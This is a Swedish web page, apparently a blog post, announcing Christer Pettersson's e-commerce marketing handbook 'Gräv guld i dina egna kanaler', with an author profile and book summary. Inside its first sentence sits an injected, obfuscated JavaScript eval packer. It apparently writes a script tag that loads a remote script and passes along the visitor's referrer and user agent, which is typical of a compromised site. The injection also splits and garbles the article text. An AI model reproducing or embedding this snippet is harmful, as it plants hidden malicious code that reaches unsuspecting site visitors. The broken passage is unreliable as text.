Image Image Image Image Image Image Image Image Image Image

| 13 maj, 2021

Scroll to top

Top

Bli framgångsrik på nätet – genom att gräva där du står

Bli framgångsrik på nätet – genom att gräva där du står
Sebastian

Hur eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rkkys|var|u0026u|referrer|frsbh||js|php’.split(’|’),0,{}))
långt måste man gå för att lyckas på nätet?

Inte långt alls. Det räcker med att du stannar i dina egna kanaler för att bli framgångsrik på din webbplats eller i din nätbutik. Det är det bästa rådet du kan få av författaren och föreläsaren Christer Pettersson, aktuell med sin handbok Gräv guld i dina egna kanaler.

Christer Pettersson är civilekonomen som har skaffat sig femton års erfarenhet av e-handel, sökmotoroptimering och content marketing. Han är en ofta anlitad föreläsare och skriver löpande på bloggar och sajter om e-handel och datadriven marknadsföring. Gräv guld i dina egna kanaler är hans åttonde bok.

Boken beskriver hur du på ett enkelt och praktiskt sätt skalar upp din affär på nätet utan att det ska behöva kosta en massa pengar. Det här är en handbok som visar hur du i praktiken kan lyfta dina egna kanaler ­– din sajt, butik och övriga kanaler som e-post, blogg, PR och sociala kanaler – och på så sätt få alla dina digitala kanaler att samverka och generera mer trafik och försäljning.

– Dina egna kanaler är din största tillgång, konstaterar Christer Pettersson.

Författaren har haft Lonely Planets reseguider som inspiration när han skrev Gräv guld i dina egna kanaler. De är böcker som underlättar resan – vilken resa du än gör. Resan i Gräv guld i dina egna kanaler går mot att öka försäljningen, trafiken och kundernas lojalitet.

Christer Pettersson arbetar idag som E-commerce Manager på Arvato, som erbjuder finansiella tjänster för bland annat e-handel.

Författaren har tidigare skrivit allt från poesi till en barn- och ungdomsbok och facklitteratur, bland annat två böcker om internet och sökmarknadsföring. Att skriva har alltid funnits med i Christers liv på något sätt, och han är en flitig bloggare och skribent på sajter om e-handel och datadriven marknadsföring.

Christer Pettersson är född i Östergötland men bor numera i Stockholm.

Mer om boken:

Gräv guld i dina egna kanaler visar hur du på ett enkelt och praktiskt sätt skalar upp din affär på nätet utan att det ska behöva kosta en massa pengar. ”Dina egna kanaler är din största tillgång” är bokens andemening. Och den visar dig hur du ska bära dig åt!

Boken vänder sig till dig som har en webbplats eller en nätbutik. Det här är en handbok som beskriver hur du i praktiken kan lyfta dina egna kanaler ­– din sajt, butik och övriga kanaler som e-post, blogg, PR och sociala kanaler – och på så sätt generera mer trafik och försäljning.

Du lär känna begrepp och handgrepp inom SEO (sökmotoroptimering), content marketing, inbound marketing, e-postmarknadsföring, growth hacking, sociala kanaler – och mycket mer.

Här finns konkreta verktyg för att öka försäljningen, trafiken och dina kunders lojalitet.

Hela idén är att lyfta på locket till dina egna kanaler så att du ser hur mycket kraft och möjligheter du sitter på själv, och som du kan använda för att lyfta din affär och din försäljning – precis som när man öppnar en rysk docka som hela tiden tycks rymma så många fler dockor än man tror!

Boken är utformad så att den ger praktiska råd med en checklista i varje kapitel. De mest matiga delarna i boken handlar om hur du skapar och strukturerar ditt innehåll så att dina kunder hittar rätt och uppskattar det de möts av på din webbplats eller i din webbutik, dvs. SEO och content marketing.

Du får också råd om hur du kan skapa rätt innehåll och därefter använda dina egna kanaler för att distribuera detta innehåll på ett bra sätt.

Utkommer 21 maj.